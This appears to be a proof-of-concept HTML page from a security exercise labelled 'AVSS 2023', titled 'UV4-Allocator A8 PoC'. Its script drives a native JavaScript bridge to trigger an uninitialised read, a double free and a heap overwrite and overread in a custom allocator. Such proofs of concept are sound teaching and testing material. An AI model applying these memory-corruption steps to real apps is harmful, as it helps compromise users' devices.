<html>
    <head>
    
    </head>
    <body>

        <h1>AVSS 2023</h1>
        <p>UV4-Allocator A8 PoC</p>

        <script type="text/javascript"  >
            function print_res(res) {
                document.write("<p>" + res + "</p>\n")
            }

            function bytesToHexString(bytes) {
                return Array.from(bytes, byte => ('0' + (byte & 0xFF).toString(16)).slice(-2)).join('');
            }
            function bytesToString(bytes) {
                return String.fromCharCode.apply(null, bytes);
            }

            function unhex(hexString) {
                let str = '';
                for (let i = 0; i < hexString.length; i += 2) {
                    const byte = parseInt(hexString.substr(i, 2), 16);
                    str += String.fromCharCode(byte);
                }
                return str;
            }
            function hex(str) {
                let hex = '';
                for (let i = 0; i < str.length; i++) {
                    hex += str.charCodeAt(i).toString(16).padStart(2, '0');
                }
                return hex;
            }

            function unpack64(data) {
                return parseInt(data.match(/../g).reverse().join(''), 16);
            }

            function pack64(data) {
                return data.toString(16).match(/../g).reverse().join('').padEnd(16, '0');
            }

            function add(idx, key, size) {
                _jsbridge.add(idx, key, size);
            }
            function edit(idx, value) {
                _jsbridge.edit(idx, value);
            }
            function show(idx, size) {
                res = _jsbridge.show(idx, size);
                console.log(res+" ");
                // print_res(res);
                return res;
            }
            function jdelete(idx) {
                _jsbridge.delete(idx);
            }
        
            console.log("Start");
            print_res("Start");


            // uninitialization
            console.log("uninitialization");
            add(0, "a0", 0x10);
            res = show(0, 0x10);
            print_res(res);
            
            // double free
            console.log("double free");
            add(1, "a1", 0x100);
            jdelete(1);
            jdelete(1);
            add(2, "a2", 0x100);
            add(3, "a3", 0x100);
            edit(2, "deadbeefdeadbeefdeadbeefdeadbeef")
            console.log("a2: ");
            res = show(2, 0x100);
            console.log("a3: ");
            res = show(3, 0x100);

            // overwrite
            console.log("overwrite 8 bytes");
            add(4, "a4", 0x100-8);
            add(5, "a5", 0x100-8);
            console.log("before: ");
            res = show(4, 0x100);

            edit(4, "".padEnd(0x100*2, "3"))

            // overread            
            console.log("after: ");
            res = show(4, 0x100);
            print_res(res);


            console.log("Done");
            print_res("Done");

            </script>
        
    </body>
</html>